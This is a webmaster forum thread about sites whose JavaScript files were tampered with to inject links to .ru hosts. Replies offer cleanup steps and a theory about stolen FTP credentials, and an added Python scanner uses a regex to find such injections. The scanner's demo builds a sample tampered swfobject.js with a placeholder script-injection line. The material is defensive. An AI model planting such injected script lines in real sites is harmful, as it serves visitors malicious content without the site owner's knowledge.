Site files compromised, need advice
some .js files were edited to print .ru urls in my sites
I noticed that 2-3 sites on one of my sites were compromised, a .ru url appeared in the footer of the site.
I was able to fix it by sorting my remote files by date modified and replacing them with the copy from my local computer.
The only thing I noticed changed were some common/known .js files like swfobject.js; it had a document.write in it to print the malware links in my pages.
My question is: what causes these things in general? Is it more likely that my local computer had a virus/worm that modified my files (maybe through Adobe Dreamweaver)? Or is it more likely that the server was compromised directly?
On the same day as the file modified date (3 August) I got an email that appeared to be from Vimeo. I clicked the link in it, and after that I saw browser errors that said some exe was not found; the computer acted suspiciously, so I had to do a system restore.
Do you think I should be safe now? Avast didn't find anything locally but it also didn't warn me about that email or virus or what that was.
Ok, I just checked, another site on a different server has the same malware, so this means it was made through my computer, right? The server was not targeted directly?! Any advice?
Some ideas on this one...
1 - Curse the hacker
2 - Remove all files, start changing all passwords.
3 - Check permissions on files and folders
4 - Reload site from last backup.
5 - Check for information specific to your hack type.
6 - Contact host, tell them what happened
7 - Cross fingers
8 - Say a prayer
9 - Monitor site very closely for a week
Best of luck, been there, hate it.
Was it similar to this [webmasterworld.com]? Do you run WordPress?
Another theory is the end user inadvertently visits a malicious site, and it installs malware that somehow monitors the user's FTP. The webmaster logs in to a site, and it sends the modified files along with it. It could be either an outright theft of the FTP login or piggybacking on the current connection, don't know. So it's entirely possible you are the source, but not definite.
I've been successful cleansing them with deep searches in all files, eliminating the code, then before uploading, changing all passwords - domain manager control panel, FTP accounts, WordPress logins, CMS logins, everything. Doesn't seem to come back after that, which may lend credibility to #2.
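One way to script the "deep search in all files" described in the reply above, combined with the modified-date check the original poster used, as an added Python example that is not code from any poster in this thread. The web-root layout, file names and the .ru host it plants are constructed for the demo; the pattern looks for a `document.write` that emits a script or iframe tag pointing at a .ru host, which is what the thread describes.

```python
import os
import re
import tempfile
from datetime import datetime, timezone

# Trace the injection described in the thread: a document.write() that emits a
# <script> or <iframe> whose src points at a .ru host. Quote handling allows
# the src to be wrapped in ", ' or escaped quotes inside the JS string literal.
INJECT_RE = re.compile(
    r"document\.write\s*\(.*?<(?:script|iframe)[^>]*?src\s*=\s*"
    r"[\"'\\]*https?://[^\"'\\\s>]*\.ru\b",
    re.IGNORECASE | re.DOTALL,
)

def scan_webroot(root, modified_after=None):
    """Return a sorted list of (relative_path, reason) for .js/.html/.php files
    that contain the injection pattern or, when modified_after (a UTC datetime)
    is given, were changed after that moment. A file may match on both."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith((".js", ".html", ".htm", ".php")):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                body = fh.read()
            if INJECT_RE.search(body):
                findings.append((rel, "document.write to .ru host"))
            if modified_after is not None:
                mtime = datetime.fromtimestamp(os.path.getmtime(path), timezone.utc)
                if mtime > modified_after:
                    findings.append((rel, "modified after %s" % modified_after.date()))
    return sorted(findings)

def demo():
    """Constructed web root: one clean library file and one tampered copy of
    swfobject.js with the injected document.write appended (placeholder host)."""
    root = tempfile.mkdtemp()
    clean = "var swfobject = function() { return {}; }();\n"
    tampered = clean + (
        "document.write(\"<script src='http://placeholder-host.ru/x.js?id=1234'>"
        "</script>\");\n")
    os.makedirs(os.path.join(root, "js"))
    with open(os.path.join(root, "js", "jquery.js"), "w") as fh:
        fh.write(clean)
    with open(os.path.join(root, "js", "swfobject.js"), "w") as fh:
        fh.write(tampered)
    return scan_webroot(root)

if __name__ == "__main__":
    for rel, reason in demo():
        print("%s: %s" % (rel, reason))
```

Run it against the real document root (with `modified_after` set to the day before the footer changed) to get a list of candidates to diff against the local copy rather than trusting the modified date alone.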
It appears to be the same malware with that link and a unique identifier after it. But I don't have WordPress on the affected sites.
I will continue conversation on that thread (above), it seems to have more details and it might help other users.
Similar here [webmasterworld.com...] but iframe tag instead of script tag.
[edited by: phranque at 6:26 am (utc) on Aug 6, 2010]
[edit reason] fix link [/edit]